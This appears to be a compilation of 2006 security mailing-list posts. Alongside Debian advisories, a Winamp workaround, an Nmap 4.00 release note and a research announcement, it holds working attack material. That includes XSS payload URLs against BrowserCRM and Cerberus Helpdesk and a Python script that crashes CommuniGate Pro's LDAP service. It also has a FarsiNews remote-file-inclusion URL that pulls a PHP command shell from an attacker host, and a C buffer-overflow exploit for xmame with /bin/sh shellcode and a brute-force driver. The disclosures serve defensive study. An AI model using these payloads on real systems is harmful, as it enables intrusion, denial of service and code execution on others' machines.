BrowserCRM vulnerable for XSS
Inputs in the BrowserCRM is not properly sanitized, and XSS is possible in a lot of the systems input fields and url parameters. Some fields have been filtered in a basic form, so that simple scripting like scriptalert('XSS')/script is not possible. Howevere, since the filtering is not based on white listing you can conduct successful XSS attacks with code like IMG SRC=javascript:alert(String.fromCharCode(88,83,83)). PoC: http://www.SITE.example/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E Vendors site:http://www.browsercrm.com/ Please credit to: Preben Nyløkken
Cerberus Helpdesk vulnerable to XSS
Inputs in the Cerberus Helpdesk is not properly sanitized, and XSS is possible in a lot of the systems input fields and url parameters. You can add XSS that will hit every user of the system, and even simple scripting tags like scriptalert(f)/script is allowed PoC: http://www.SITE.example/tts2/clients.php?mode=searchsid=sidvaluecontact_search=scriptalert('c')/script Vendors site: http://www.webgroupmedia.com Please credit to: Preben Nyløkken
Re: Re: Winamp 5.12 - 0day exploit - code execution through playlist
Nullsoft has released a fixed version 5.13 now. Internet Storm Center shared the information last night at http://isc.sans.org/diary.php?storyid=1080 An official download link is http://www.winamp.com/player/ - Juha-Matti You can disable auto launching Winamp for playlist files as a workaround. For Firefox, go to Tools / Options settings, click on Download icon, then click on View Edit Actions... Scroll down to M3U extension and then push the Remove Action button. Firefox will no longer automatically launch firefox for Winamp playlist files. It is a good idea in general for attack surface reduction to trim down the View Edit actions to just the ones you need. Do you really need AIFF and AU autolaunching for instance? What about all those Quicktime and Acrobat formats? Looks like a lot of unnecessary attack surface to me. For IE you need to disable the file type in Windows Explorer. Go to Tools / Folder Options / File Types. Scroll down to the file extension you want to change. In this case its M3U. Check Confirm after download. You will be prompted to launch WinAmp if a M3U file is downloaded. You can remove the file type completely but that will also remove the ability to double-click to launch playlists from the Windows shell. You may want to go through this list and check confirm after download for many file types. It would be nice if more vendors installed their file types with this option in place. -Chris
Re: EasyCMS vulnerable to XSS injection.
Kind of you to notice, our system will during the next week be patched for XSS flaws in the different input fields which might be of concern for XSS. The rest of the system will also be checked to reensure that all user-input is processed securely. We take this matter seriusly, and would like to inform that you are referring to the input fields of the contact form - which outputs a reciept with the given data which was not checked for XSS, since we don't use cookies in Easy CMS. I will update this post when we have more news on this upcomming security update. regards, Kim Steinhaug Easy CMS developer
Proof of concept for CommuniGate Pro Server vulnerability
Hi all, The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities (http://www.gleg.net/cg_advisory.txt) #!/usr/bin/env python # Use this code at your own risk. # It may crash your server! # Author: Evgeny Legerov import sys import socket HELP= CommuniGate Pro 5.0.6 vulnerability. Found with ProtoVer LDAP testsuite v1.1 Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1389495376 (LWP 20235)] 0xada99bbc in memcpy () from /lib/libc.so.6 (gdb) backtrace #0 0xada99bbc in memcpy () from /lib/libc.so.6 #1 0x083924b8 in STCopyCString () #2 0x08349d5b in BERPackedData::makeCString () #3 0x081ae71a in VLDAPInput::processBINDrequest () #4 0x081af747 in VLDAPInput::processInput () #5 0x082c9373 in VStream::worker () #6 0x082ca1e9 in VStream::starter () #7 0x08399e7d in STThreadStarter () #8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0 #9 0xadaf8dee in clone () from /lib/libc.so.6 (gdb) x/i $eip 0xada99bbc memcpy+28: repz movsl %ds:(%esi),%es:(%edi) (gdb) info regi esi edi ecx esi0x8688961141068641 edi0x86c6fff141324287 ecx0x3fff7eae 1073708718 print HELP host=localhost port=389 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) s = \x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80 s += \x84\xff\xff\xff\xff sock.sendall(s) sock.close() 1+1=2 Best regards, Evgeny Legerov
[SECURITY] [DSA 957-2] New ImageMagick packages fix arbitrary command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 957-2 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 31st, 2006 http://www.debian.org/security/faq - -- Package: imagemagick Vulnerability : missing shell meta sanitising Problem type : local (remote) Debian-specific: no CVE ID : CVE-2005-4601 BugTraq ID : 16093 Debian Bug : 345238 Florian Weimer discovered that delegate code in ImageMagick is vulnerable to shell command injection using specially crafted file names. This allows attackers to encode commands inside of graphic commands. With some user interaction, this is exploitable through Gnus and Thunderbird. This update filters out the '$' character as well, which was forgotton in the former update. For the old stable distribution (woody) this problem has been fixed in version 5.4.4.5-1woody8. For the stable distribution (sarge) this problem has been fixed in version 6.0.6.2-2.6. For the unstable distribution (sid) this problem has been fixed in version 6.2.4.5-0.6. We recommend that you upgrade your imagemagick packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8.dsc Size/MD5 checksum: 852 fc5fe3786f18e31776c5109149beac1d http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8.diff.gz Size/MD5 checksum:17314 476cdfed2f44b7408ddad37f4c3324cb http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5.orig.tar.gz Size/MD5 checksum: 3901237 f35e356b4ac1ebc58e3cffa7ea7abc07 Alpha architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum: 1310122 6e7cc62b742c715da4f71d218ae1dbae http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum: 154410 ec18833c61573cbb75495706283abbb5 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum:56628 ed24011751c90a526ffad462fc9440a0 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum: 833808 85d1c0728ec664f0743ddd354e771613 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5-dev_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum:67624 a10f44b82341a743cf0dce936b036791 http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_5.4.4.5-1woody8_alpha.deb Size/MD5 checksum: 114122 96be3fb4dc0feb9ac580ba008f825479 ARM architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_arm.deb Size/MD5 checksum: 1297412 3660aafabc9853cc02a84d121c28d218 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_arm.deb Size/MD5 checksum: 119112 06af700adbbcae6e0016a66e16699be3 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_arm.deb Size/MD5 checksum:56668 3e41f0ce3936ba06f82893592a299620 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5_5.4.4.5-1woody8_arm.deb Size/MD5 checksum: 899276 1e765ee6069a3c600ab85cd834811a6b http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5-dev_5.4.4.5-1woody8_arm.deb Size/MD5 checksum:67654 79eec2c54b674de34462f2a03981d487 http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_5.4.4.5-1woody8_arm.deb Size/MD5 checksum: 110240 081b7a943d53aca6fa73f7e55c65e04b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_i386.deb Size/MD5 checksum: 1295102 56fda4def88fee79d55a25408d1367f4 http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_i386.deb Size/MD5 checksum: 123052 c6a678056c89d1d209bd2229508db7ad http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_i386.deb Size/MD5 checksum:56622
FarsiNews 2.1 PHP Remote File Inclusion
Remote File Inclusion in FarsiNews 2.1 and below Credit: The information has been provided by Hamid Ebadi (Hamid Network Security Team) :[EMAIL PROTECTED] The original article can be found at : http://hamid.ir/security Vulnerable Systems: FarsiNews 2.1 Beta 2 and below Vulnerable Code: The following lines in loginout.php : require_once($cutepath./inc/functions.inc.php); require_once($cutepath./data/config.php); Exploits: If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file. The following URL will cause the server to include external files ( phpshell.txt ): http://[target]/loginout.php?cmd=dircutepath=http://[attacker]/phpshell.txt? phpshell.txt --- ? system ($_GET['cmd']); die (h3http://Hamid.ir Hamid Ebadi (Hamid Network Security Team)/h3 ); ? -[EOF] Workaround: use FarsiNews 2.5 or for Unofficial Patch , simply add the following line in the second line of loginout.php: if (isset($_REQUEST[cutepath])){ die(Patched by Hamid Ebadi --http://hamid.ir ( Hamid Network Security Team) ); } Signature __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Nmap 4.00 Released
Bugtraqers, Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 4.00 from http://www.insecure.org/nmap/ . I try not to burden the Bugtraq list with more than one Nmap announcement per year. So I encourage those of you who would like to hear about new Nmap releases as they happen to join the low-volume nmap-hackers list at http://cgi.insecure.org/mailman/listinfo/nmap-hackers . I just did an interview for SecurityFocus which provides some further details on this release: http://www.securityfocus.com/columnists/384 CHANGES: Nmap has undergone many substantial changes since our last major release (3.50 in February 2004) and we recommend that all current users upgrade. Here are the most important improvements made in the 36 intermediate releases since 3.50: o Added the ability for Nmap to send and properly route raw ethernet frames containing IP datagrams rather than always sending the packets via raw sockets. This is particularly useful for Windows, since Microsoft has disabled raw socket support in XP. Nmap tries to choose the best method at runtime based on platform, though you can override it with the new --send-eth and --send-ip options. o Added ARP scanning (-PR). Nmap can now send raw ethernet ARP requests to determine whether hosts on a LAN are up, rather than relying on higher-level IP packets (which can only be sent after a successful ARP request and reply anyway). This is much faster and more reliable (not subject to IP-level firewalling) than IP-based probes. It is now used automatically for any hosts that are detected to be on a local ethernet network, unless --send-ip was specified. o Added the --spoof-mac option, which asks Nmap to use the given MAC address for all of the raw ethernet frames it sends. Valid --spoof-mac argument examples are Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco. o Rewrote core port scanning engine, which is now named ultra_scan(). Improved algorithms make this faster (often dramatically so) in almost all cases. Not only is it superior against single hosts, but ultra_scan() can scan many hosts (sometimes hundreds) in parallel. This offers many efficiency/speed advantages. For example, hosts often limit the ICMP port unreachable packets used by UDP scans to 1/second. That made those scans extraordinarily slow in previous versions of Nmap. But if you are scanning 100 hosts at once, suddenly you can receive 100 responses per second. Spreading the scan amongst hosts is also gentler toward the target hosts. o Overhauled UDP scan. Ports that don't respond are now classified as open|filtered (open or filtered) rather than open. The (somewhat rare) ports that actually respond with a UDP packet to the empty probe are considered open. If version detection is requested, it will be performed on open|filtered ports. Any that respond to any of the UDP probes will have their status changed to open. This avoids the false-positive problem where filtered UDP ports appear to be open, leading to terrified newbies thinking their machine is infected by back orifice. o Put Nmap on a diet, with changes to the core port scanning routine (ultra_scan) to substantially reduce memory consumption, particularly when tens of thousands of ports are scanned. o Added 'leet ASCII art to the configurator! Note that only people compiling the UNIX source code get this. (ASCII artist unknown). If you don't like it, feel free to submit your own work. o Wrote a new man page from scratch. It is much more comprehensive (more than twice as long) and (IMHO) better organized than the previous one. Read it online at http://www.insecure.org/nmap/man/ or docs/nmap.1 from the Nmap distribution. Let me know if you have any ideas for improving it. Translations to Chinese, French, Japanese, Brazilian Portuguese, Portugal Portuguese, and Romanian can be found on the Nmap docs page at http://www.insecure.org/nmap/docs.html . More than a dozen other translations are in progress. The XML source for the man page is distributed with Nmap in docs/nmap-man.xml. Patches to Nmap that are user-visible should include patches to the man page XML source rather than to the generated Nroff. o Integrated all service submissions up to January 2006. The DB has tripled in size since 3.50 to 3,153 signatures for 381 service protocols. Those protocols span the gamut from abc, acap, afp, and afs to zebedee, zebra, and zenimaging. It even covers obscure protocols such as http, ftp, smtp, and ssh :). Thanks to Version Detection Czar Doug Hoyte for his excellent work on this. Other great probes and signatures came from Dirk Mueller (mueller(a)kde.org), Lionel Cons (lionel.cons(a)cern.ch), Martin Macok (martin.macok(a)underground.cz), and Bo Jiang (jiangbo(a)brandeis.edu). Thanks also go to the (literally) thousands of you who
Xmame 0.102 local vulnerability proof-of-concept
The following proof-of-concept demonstrates the existence of the local vulnerability found in xmame 0.102. It uses the brute-force technique. The RET address interval works on Intel Debian GNU/Linux. To test for the vulnerability, run gcc exploit-c -o exploit and then perl fb.pl. exploit.c: #define NOP 0x90 #define TAMBUF 1200 #define INIC_SH 400 #include stdlib.h int main (int argc, char **argv) { static char shellcode[]= \xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89 \xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e \x2f\x73\x68\x58; char buffer [TAMBUF + 1]; char cadena [TAMBUF + 3]; int cont; unsigned long ret = strtoul (argv[1], NULL, 16); for (cont = 0; cont TAMBUF / 4; cont++) *( (long *) buffer + cont) = ret; for (cont = 0; cont strlen (shellcode); cont++) buffer [cont + INIC_SH] = shellcode [cont]; for (cont = 0; cont INIC_SH; cont++) buffer [cont] = NOP; buffer [TAMBUF] = 0; printf (RET = 0x%x\n, ret); strcpy (cadena, AA); strcat (cadena, buffer); execl (./xmame.x11, ./xmame.x11, -pb, cadena, (char *) 0); } fb.pl: #!/usr/bin/perl $cnt = 0xbfffe000; while (1) { $hex = sprintf (0x%x, $cnt); $res = system (./exploit $hex); printf $hex : $res\n; $cnt += 4; } Greetings, Rafael San Miguel Carrasco Security Consultant www.rafaelsanmiguel.com
[SECURITY] [DSA 960-2] New libmail-audit-perl packages fix insecure temporary file use
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 960-2 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 31st, 2006 http://www.debian.org/security/faq - -- Package: libmail-audit-perl Vulnerability : insecure temporay file createion Problem type : local Debian-specific: no CVE ID : CVE-2005-4536 Debian Bug : 344029 This update only corrects the update for sarge, the version in woody is correct. Niko Tyni discovered that the Mail::Audit module, a Perl library for creating simple mail filters, logs to a temporary file with a predictable filename in an insecure fashion when logging is turned on, which is not the case by default. For the old stable distribution (woody) these problems have been fixed in version 2.0-4woody1. For the stable distribution (sarge) these problems have been fixed in version 2.1-5sarge2. For the unstable distribution (sid) these problems have been fixed in version 2.1-5.1. We recommend that you upgrade your libmail-audit-perl package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2.dsc Size/MD5 checksum: 786 00abe0533af4fb16e3f65a5dda9ded34 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2.diff.gz Size/MD5 checksum: 4266 4348a85b636a87503374874354eefdcd http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1.orig.tar.gz Size/MD5 checksum:21669 b52b1142fa9ed7d847c531186f913ea6 Architecture independent components: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2_all.deb Size/MD5 checksum:41874 136f752ab91f2ce393f1c943d151c0e3 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/mail-audit-tools_2.1-5sarge2_all.deb Size/MD5 checksum:1 d3caeeef4e88540511c1fdb3ae3f8877 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFD39KyW5ql+IAeqTIRAlxMAJ9MTW2uVg36G+PBmXu/LmxqaxlACwCgrF+6 P4Nx1XWnEpv3cu/Y7sI1HWs= =wjbv -END PGP SIGNATURE-
Windows Access Control Demystified
Hello everybody, We have constructed a logical model of Windows XP access control, in a declarative but executable (Datalog) format. We have built a scanner that reads access-control configuration information from the Windows registry, file system, and service control manager database, and feeds raw configuration data to the model. Therefore we can reason about such things as the existence of privilege-escalation attacks, and indeed we have found several user-to-administrator vulnerabilities caused by misconfigurations of the access-control lists of commercial software from several major vendors. We propose tools such as ours as a vehicle for software developers and system administrators to model and debug the complex interactions of access control on installations under Windows. The full version of the paper can be found at: http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf All the vendors and CERT are aware of this paper. The bugs are *not* remotely exploitable. The CERT id is VU#953860. regards, Sudhakar Govindavajhala and Andrew Appel. Bio: Sudhakar Govindavajhala is a finishing PhD student at Computer Science department, Princeton university. His interests are computer security, operating systems and networks. Sudhakar is looking for employment opportunities. Andrew Appel is a Professor of Computer Science at Princeton University. He is currently on sabbatcal at INRIA Rocquencourt. His interests are computer security, compilers, programming languages, type theory, and functional programming.